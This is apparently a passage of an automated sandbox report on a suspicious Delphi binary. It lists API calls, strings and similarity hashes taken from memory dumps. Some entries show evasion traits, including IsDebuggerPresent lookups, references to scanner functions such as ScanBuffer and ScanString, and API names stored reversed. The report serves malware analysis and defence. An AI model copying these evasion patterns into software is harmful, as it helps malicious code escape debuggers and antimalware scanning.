                                                                                                                                              • API ID: Read$HandleModule
                                                                                                                                              • String ID: KernelBase$LoadLibraryExA
                                                                                                                                              • API String ID: 2226866862-113032527
                                                                                                                                              • Opcode ID: 3fa1dde31095019c0cd2adce0c1a52c31426cee54ef3ae455332a6ae78cfda53
                                                                                                                                              • Instruction ID: 39677e77180feee70b502cfd2ebffa8f97a7b7739535e1effdb7423e654ae1d8
                                                                                                                                              • Opcode Fuzzy Hash: 3fa1dde31095019c0cd2adce0c1a52c31426cee54ef3ae455332a6ae78cfda53
                                                                                                                                              • Instruction Fuzzy Hash: F6314FB2A40305BBDB20DF68CC89F5A77B8BF06724F144564EA54EB280D374E950CBA5
                                                                                                                                              APIs
                                                                                                                                              • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,027C43F3,?,?,028207C8,?,?,027ED7A8,027C655D,027EC30D), ref: 027C4365
                                                                                                                                              • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,027C43F3,?,?,028207C8,?,?,027ED7A8,027C655D,027EC30D), ref: 027C436B
                                                                                                                                              • GetStdHandle.KERNEL32(000000F5,027C43B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,027C43F3,?,?,028207C8), ref: 027C4380
                                                                                                                                              • WriteFile.KERNEL32(00000000,000000F5,027C43B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,027C43F3,?,?), ref: 027C4386
                                                                                                                                              • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 027C43A4
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileHandleWrite$Message
                                                                                                                                              • String ID: Error$Runtime error at 00000000
                                                                                                                                              • API String ID: 1570097196-2970929446
                                                                                                                                              • Opcode ID: 5d146d3ae4a501139136964ae8c2ff191666e08badc72e6dfc7edb58065a8144
                                                                                                                                              • Instruction ID: 0290624546b6979eccb322be0623bceb79d136549c934cc1c365d295f79e3db1
                                                                                                                                              • Opcode Fuzzy Hash: 5d146d3ae4a501139136964ae8c2ff191666e08badc72e6dfc7edb58065a8144
                                                                                                                                              • Instruction Fuzzy Hash: 01F0F6B4AC030079FA25A3B06C2AF592B5D0788B20F740A1CB628A40C1C7E890C4CB32
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 027CACC4: VirtualQuery.KERNEL32(?,?,0000001C), ref: 027CACE1
                                                                                                                                                • Part of subcall function 027CACC4: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 027CAD05
                                                                                                                                                • Part of subcall function 027CACC4: GetModuleFileNameA.KERNEL32(027C0000,?,00000105), ref: 027CAD20
                                                                                                                                                • Part of subcall function 027CACC4: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 027CADB6
                                                                                                                                              • CharToOemA.USER32(?,?), ref: 027CAE83
                                                                                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 027CAEA0
                                                                                                                                              • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 027CAEA6
                                                                                                                                              • GetStdHandle.KERNEL32(000000F4,027CAF10,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 027CAEBB
                                                                                                                                              • WriteFile.KERNEL32(00000000,000000F4,027CAF10,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 027CAEC1
                                                                                                                                              • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 027CAEE3
                                                                                                                                              • MessageBoxA.USER32(00000000,?,?,00002010), ref: 027CAEF9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 185507032-0
                                                                                                                                              • Opcode ID: 9344df3e81b009a1b4241cef9eaace335b3e70f1df130e61bf931306fff351a5
                                                                                                                                              • Instruction ID: eaadf68b123fae0cac5a5429ef1b8043a06e31bba5b8e6104b7d43f36a5bf978
                                                                                                                                              • Opcode Fuzzy Hash: 9344df3e81b009a1b4241cef9eaace335b3e70f1df130e61bf931306fff351a5
                                                                                                                                              • Instruction Fuzzy Hash: C01170B65842057ED302FBB4DC89F9B77EEAB85700F60092EB344E61D1DA71E9448F62
                                                                                                                                              APIs
                                                                                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 027CE5AD
                                                                                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 027CE5C9
                                                                                                                                              • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 027CE602
                                                                                                                                              • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 027CE67F
                                                                                                                                              • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 027CE698
                                                                                                                                              • VariantCopy.OLEAUT32(?,00000000), ref: 027CE6CD
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 351091851-0
                                                                                                                                              • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                              • Instruction ID: 2cb618a4c31123327178c5a5472d9195296cafec5c291ae541f322ce06a5d305
                                                                                                                                              • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                              • Instruction Fuzzy Hash: 0351C875A0062D9BCB22EB68CC94BD9B3BDBF4D300F5041EDE949A7241D634AF858F61
                                                                                                                                              APIs
                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 027C358A
                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,027C35D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 027C35BD
                                                                                                                                              • RegCloseKey.ADVAPI32(?,027C35E0,00000000,?,00000004,00000000,027C35D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 027C35D3
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                              • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                              • API String ID: 3677997916-4173385793
                                                                                                                                              • Opcode ID: 518ef2149cdf098a57ca6132d51b37dcac49ac0875600e25cd9704e67b854861
                                                                                                                                              • Instruction ID: 3ac56f315323c17da2f222ecace8a2432bcc3ce3af9995a1d116bf77d6116b0f
                                                                                                                                              • Opcode Fuzzy Hash: 518ef2149cdf098a57ca6132d51b37dcac49ac0875600e25cd9704e67b854861
                                                                                                                                              • Instruction Fuzzy Hash: 4901B5B9A40218FAEB11DBB09D02BBE77ECD708710F6045ADBA04E6580F6749610CA68
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027D8150,?,?,00000000,00000000,?,027D8069,00000000,KernelBASE,00000000,00000000,027D8090), ref: 027D8115
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027D811B
                                                                                                                                              • GetProcAddress.KERNEL32(?,?), ref: 027D812D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                                              • String ID: Kernel32$sserddAcorPteG
                                                                                                                                              • API String ID: 667068680-1372893251
                                                                                                                                              • Opcode ID: a4cee9a99b680e8d4f250e5d71799df4d6cd8bf277f583447b91731106d5c786
                                                                                                                                              • Instruction ID: 1d850b71241cb59b4e5f07587b83a4ab6f6522820cf02439ecf0082154bb7753
                                                                                                                                              • Opcode Fuzzy Hash: a4cee9a99b680e8d4f250e5d71799df4d6cd8bf277f583447b91731106d5c786
                                                                                                                                              • Instruction Fuzzy Hash: EC01A778640304AFEB01EFB4DC59E5E77BEEB48710F62886CF404D7640D634A9048A25
                                                                                                                                              APIs
                                                                                                                                              • GetThreadLocale.KERNEL32(?,00000000,027CAA6F,?,?,00000000), ref: 027CA9F0
                                                                                                                                                • Part of subcall function 027CA74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 027CA76A
                                                                                                                                              • GetThreadLocale.KERNEL32(00000000,00000004,00000000,027CAA6F,?,?,00000000), ref: 027CAA20
                                                                                                                                              • EnumCalendarInfoA.KERNEL32(Function_0000A924,00000000,00000000,00000004), ref: 027CAA2B
                                                                                                                                              • GetThreadLocale.KERNEL32(00000000,00000003,00000000,027CAA6F,?,?,00000000), ref: 027CAA49
                                                                                                                                              • EnumCalendarInfoA.KERNEL32(Function_0000A960,00000000,00000000,00000003), ref: 027CAA54
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4102113445-0
                                                                                                                                              • Opcode ID: 12dac8e19ad1852cf6e9eceb9bb22409608be0e12dde8da24a9178ad7d0e4a01
                                                                                                                                              • Instruction ID: c7e6d10799c9aff47cc17c8a987bdacb2cb83931e94a0ce5a8df34381a239321
                                                                                                                                              • Opcode Fuzzy Hash: 12dac8e19ad1852cf6e9eceb9bb22409608be0e12dde8da24a9178ad7d0e4a01
                                                                                                                                              • Instruction Fuzzy Hash: 74012675600A5C6FF703FAB48D16B6E775DDB86721FB1016CF600E6BC4D6749E008AA8
                                                                                                                                              APIs
                                                                                                                                              • GetThreadLocale.KERNEL32(?,00000000,027CAC58,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 027CAAB7
                                                                                                                                                • Part of subcall function 027CA74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 027CA76A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Locale$InfoThread
                                                                                                                                              • String ID: eeee$ggg$yyyy
                                                                                                                                              • API String ID: 4232894706-1253427255
                                                                                                                                              • Opcode ID: fdf46422bb15996be9345859de06a8ac0aa4916fc76ac77595c7d0ddc6175ab4
                                                                                                                                              • Instruction ID: 265be3809ff567752db84401002d49463c412d607a2081c08d5dfd9b73ef06fe
                                                                                                                                              • Opcode Fuzzy Hash: fdf46422bb15996be9345859de06a8ac0aa4916fc76ac77595c7d0ddc6175ab4
                                                                                                                                              • Instruction Fuzzy Hash: 6441E27470450E4BD723AF78C8A86BEB3ABDB85302F34463ED462D7344E638D9058A21
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,027D8090,?,?,00000000,?,027D7A06,ntdll,00000000,00000000,027D7A4B,?,?,00000000), ref: 027D805E
                                                                                                                                                • Part of subcall function 027D80C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,027D8150,?,?,00000000,00000000,?,027D8069,00000000,KernelBASE,00000000,00000000,027D8090), ref: 027D8115
                                                                                                                                                • Part of subcall function 027D80C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 027D811B
                                                                                                                                                • Part of subcall function 027D80C8: GetProcAddress.KERNEL32(?,?), ref: 027D812D
                                                                                                                                              • GetModuleHandleA.KERNELBASE(?), ref: 027D8072
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HandleModule$AddressProc
                                                                                                                                              • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                                                                              • API String ID: 1883125708-1952140341
                                                                                                                                              • Opcode ID: 9f8e2423de8a5835bb7e47e7028e6dc899355c0a91610d9b075c3c68e7241f02
                                                                                                                                              • Instruction ID: 003c0a418d7efa8731eaf37614967d88716607eecfd28b960508fcf674853594
                                                                                                                                              • Opcode Fuzzy Hash: 9f8e2423de8a5835bb7e47e7028e6dc899355c0a91610d9b075c3c68e7241f02
                                                                                                                                              • Instruction Fuzzy Hash: D2F0C279600304AFEB11EFB4D91D91E7BBEE749700BA24868F400D3A00D634AD058A25
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleW.KERNEL32(KernelBase,?,027DEF98,UacInitialize,0282137C,027EAFD8,OpenSession,0282137C,027EAFD8,ScanBuffer,0282137C,027EAFD8,ScanString,0282137C,027EAFD8,Initialize), ref: 027DEB9A
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 027DEBAC
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                                              • String ID: IsDebuggerPresent$KernelBase
                                                                                                                                              • API String ID: 1646373207-2367923768
                                                                                                                                              • Opcode ID: 38ee87666a58dcc8da6e9fc9c45aefcdbd9d74b31f1d178c99d8685cfe446c80
                                                                                                                                              • Instruction ID: 218846407c1d2b5d619c3ee1ae7557a579076c2cd3413ef5df780a66de8c0fd7
                                                                                                                                              • Opcode Fuzzy Hash: 38ee87666a58dcc8da6e9fc9c45aefcdbd9d74b31f1d178c99d8685cfe446c80
                                                                                                                                              • Instruction Fuzzy Hash: F4D08CE27557101FFA027AF40CC8C2E0ADD8B8563E3340F79F063EA1D2E6BAD8521510
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,?,027EC10B,00000000,027EC11E), ref: 027CC402
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 027CC413
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                                              • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                              • API String ID: 1646373207-3712701948
                                                                                                                                              • Opcode ID: ee95535ceae321a446f899ad1eec1e49d3cab24163cc8634f1bb5339cb38eaf2
                                                                                                                                              • Instruction ID: 03155a981350899e5719746aa6be458565c345b2fe1ab3b1b8556286f6a950f8
                                                                                                                                              • Opcode Fuzzy Hash: ee95535ceae321a446f899ad1eec1e49d3cab24163cc8634f1bb5339cb38eaf2
                                                                                                                                              • Instruction Fuzzy Hash: 3FD05EB0A403018EEB12AAB168C56322E8C8748745BB0D82EB01959101E77245104FA4
                                                                                                                                              APIs
                                                                                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 027CE21F
                                                                                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 027CE23B
                                                                                                                                              • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 027CE2B2
                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 027CE2DB
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 920484758-0
                                                                                                                                              • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                              • Instruction ID: 66d10c83447bc753f81b1351100d99e366b7532ae374a69602f4854351764fc9
                                                                                                                                              • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                              • Instruction Fuzzy Hash: 44411875A0061D9FCB62DB68CC94BD9B3BDBB49300F1041EDEA48A7301DA30AF808F50
                                                                                                                                              APIs
                                                                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C), ref: 027CACE1
                                                                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 027CAD05
                                                                                                                                              • GetModuleFileNameA.KERNEL32(027C0000,?,00000105), ref: 027CAD20
                                                                                                                                              • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 027CADB6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3990497365-0
                                                                                                                                              • Opcode ID: 7459ec85b8504d81e14016a10e18fbffccacb0cc7920e81b22f2fcfe11ce56a5
                                                                                                                                              • Instruction ID: d0d99f6c6b23318a82975bd669329d04b312f7321c921ae11f2b063c8b41ecdf
                                                                                                                                              • Opcode Fuzzy Hash: 7459ec85b8504d81e14016a10e18fbffccacb0cc7920e81b22f2fcfe11ce56a5
                                                                                                                                              • Instruction Fuzzy Hash: 52410B71A4025C9BDB22DF78CC88BDAB7FDAB18301F2044EDA548A7245DB759B848F51
                                                                                                                                              APIs
                                                                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C), ref: 027CACE1
                                                                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 027CAD05
                                                                                                                                              • GetModuleFileNameA.KERNEL32(027C0000,?,00000105), ref: 027CAD20
                                                                                                                                              • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 027CADB6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
